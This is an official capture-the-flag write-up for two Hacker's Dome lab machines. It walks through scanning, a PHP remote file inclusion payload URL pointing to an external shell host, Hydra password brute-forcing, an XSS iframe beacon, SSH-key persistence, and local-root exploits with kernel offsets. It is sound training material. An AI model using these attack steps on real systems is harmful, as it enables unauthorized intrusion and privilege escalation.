CTF-FirstBlood3

Hacker’s Dome – First Blood | The Official Writeup

May 27, 2014

I’ll try to keep this information to a minimum for better readability. The setup was replicated over a local network for faster access.

ctf01-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 6.67 seconds

nmap -sU 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00044s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1092.14 seconds

The web server running on 80/tcp doesn’t give up any information from the index, but a web scanner doesn’t hurt.

nikto -host 10.200.0.4 -C all
– Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-05-23 13:08:41 (GMT3)
—————————————————————————
+ Server: Apache/2.2.3 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 2130490, size: 179, mtime: Wed Mar 3 04:53:52 2027
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Cookie openscrutin created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3092: /development/: This might be interesting…
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake’s list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 22353 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2014-05-23 13:09:45 (GMT3) (64 seconds)
—————————————————————————
+ 1 host(s) tested

There are a couple of interesting items: the /info.php script and the /development/ directory.

The info.php script is a simple script that runs the phpinfo() function. This is a fairly common mistake made by PHP developers, leaving scripts like this for getting this information from the production server. Unfortunately, “baddies” may also discover these poorly thought-out decisions.

The juicy bits from phpinfo() are:

PHP 5.1.6 and allow_url_fopen = On

This is a PHP default configuration option and, prior to PHP 5.2.0, will allow the remote inclusion of PHP code. PHP 5.2.0 adds allow_url_include, which is disabled by default to mitigate remote file inclusion attacks.

register_globals = On

This is a common “misconfiguration” made by developers who are too lazy to get stuff out of superglobals, such as $_GET and $_POST. Therefore, when the register_globals configuration option is turned on, $_GET['foo'] is registered as a global $foo. When combining this “misconfiguration” with allow_url_fopen and sloppy coding full of include statements that use uninitialized variables, the result is a guaranteed recipe for disaster.

The application from /development/ is the perfect example of the recipe mentioned above: Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability.

The first RFI example is http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]

Putting that into practice:

ctf01-01-pwn

I’d like to point out that the machine is running a 32-bit build. As pointed out by some of our contestants, some of you attempted to hit it with 64-bit local root exploits. That’s a big no-no. uname -a on the target machine and gcc’s -m32 flag on your machine are your friends.

The 2.6.18-8.el5 is vulnerable to the venerable Sendpage Local Privilege Escalation, also known as CVE-2009-2692. I used this exploit because, in my experience, it works well on most targets.

gcc -m32 9545.c -o sock_sendpage
file sock_sendpage
sock_sendpage: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xa7e09b5a2c75ae82884ab06a9f378491eb6221a7, not stripped

ctf01-02 – the First Blood edition, IP address: 10.200.0.6

As previously mentioned, this machine was watered down due to technical issues. Although it took us longer to deploy, you got two machines as we promised.

I’ll start with the “easy way in”. I added a user that is also used for HTTP Basic Authentication on this machine, simulating a common mistake: credential reuse.

root@ctf01-02:~# adduser admin
Adding user `admin’ …
Adding new group `admin’ (1001) …
Adding new user `admin’ (1001) with group `admin’ …
Creating home directory `/home/admin’ …
Copying files from `/etc/skel’ …
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@ctf01-02:~#

This part also includes a hidden flaw that is due to a default Ubuntu policy, which some people are unaware of. If you add an admin user, sudo allows this admin user to run stuff as root, even though it isn’t obvious in the above dialogue.

The issue is the default sudoers policy:

root@ctf01-02:~# cat /etc/sudoers | grep ALL
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL

This shows that there are two “supergroups” there – sudo and admin. However, before running the adduser command, there wasn’t any admin group; only the sudo group exists.

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 7.32 seconds

nmap -sU 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00065s latency).
Not shown: 949 closed ports, 50 open|filtered ports
PORT STATE SERVICE
5353/udp open zeroconf
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1022.47 seconds

However, the port 80/tcp is behind password authentication:

curl -I 10.200.0.6
HTTP/1.1 401 Authorization Required
Date: Fri, 23 May 2014 11:32:27 GMT
Server: Apache/2.2.22 (Ubuntu)
WWW-Authenticate: Basic realm=”Private party; admin area”
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1

The WWW-Authenticate: Basic realm header indicates what a good guess for the username would be. Anyway, “admin” is definitely a Top 20 username, hence an easy guess with a basic brute force attack.

cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/
ls
unix_passwords.txt unix_users.txt
hydra -L unix_users.txt -P unix_passwords.txt http://10.200.0.6/
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-23 14:43:24
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[DATA] 16 tasks, 1 server, 108000 login tries (l:108/p:1000), ~6750 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 10.200.0.6 login: admin password: qwerty

The brute force succeeds fairly quickly. Since SSH is open, it’s worth trying the same credentials:

ctf01-02-fb-pwn

ctf01-02 – the original edition, IP address: 10.200.0.6

This is the write-up for the original machine that didn’t take part in the competition. This is what you get in the pristine image that was made available for download. The intention was to make this the “intermediate” level image, but it happened to be the easy one.

I discovered that I couldn’t replicate the attack by using an isolated network without Internet access. If the client-side exploit fails, try to provide Internet access to the machine. We tried to provide Internet access to the machine on the Hacker’s Dome network, but I was still unable to get a reliable exploit.

At this point, I skipped to the point where the HTTP Basic Authentication is bypassed with admin/qwerty. There’s a web application running there which states: “Hi people. Post a message while I’m AFK. Say what you need. I’ll check periodically to see if there’s something new.”

It proves to be vulnerable to XSS:

ctf01-02-orig-xss

The next step is to verify if another client is accessing this resource. So, while monitoring Apache’s access log, I injected an iframe <iframe src=”http://10.0.0.4/”>:

ctf01-02-orig-iframe

So there’s some information about the user agent of the admin who checks his messages: Firefox/17.0. By doing a little research, this page shows up: Firefox 17.0.1 Flash Privileged Code Injection.

Putting that into practice:

ctf01-02-orig-firefox-pwn

The connection is unstable since the remote user agent is restarted often, therefore the access needs to be fixated quickly. Since the SSH port is open and a daemon is running there, the fastest option is to add your SSH public key to ~/.ssh/authorized_keys.

pwd
/home/xubuntu
mkdir .ssh
echo “ssh-rsa [the rest of the public key]“ > .ssh/authorized_keys
cat .ssh/authorized_keys
ssh-rsa [the rest of the public key]
chmod 600 .ssh/authorized_keys

The installed kernel proves to be vulnerable to the quite fresh CVE-2014-0038. This public exploit proves to be the fastest, even though it requires editing some addresses to make it work under this kernel.

The addresses for Ubuntu 12.04 running 3.8.0-29-generic are:

PTMX_FOPS 0xffffffff81f16f20LL
TTY_RELEASE 0xffffffff81420c30LL
COMMIT_CREDS 0xffffffff81086780LL
PREPARE_KERNEL_CRED 0xffffffff81086a00LL

timeoutpwn.c needs to be updated with these addresses and uploaded to the victim machine since there’s a gcc installation there.

ctf01-02-orig-exploit

Then, there’s a clear path to root:

ctf01-02-orig-pwn

Tags: , , , , , ,

One Comment

Leave a Comment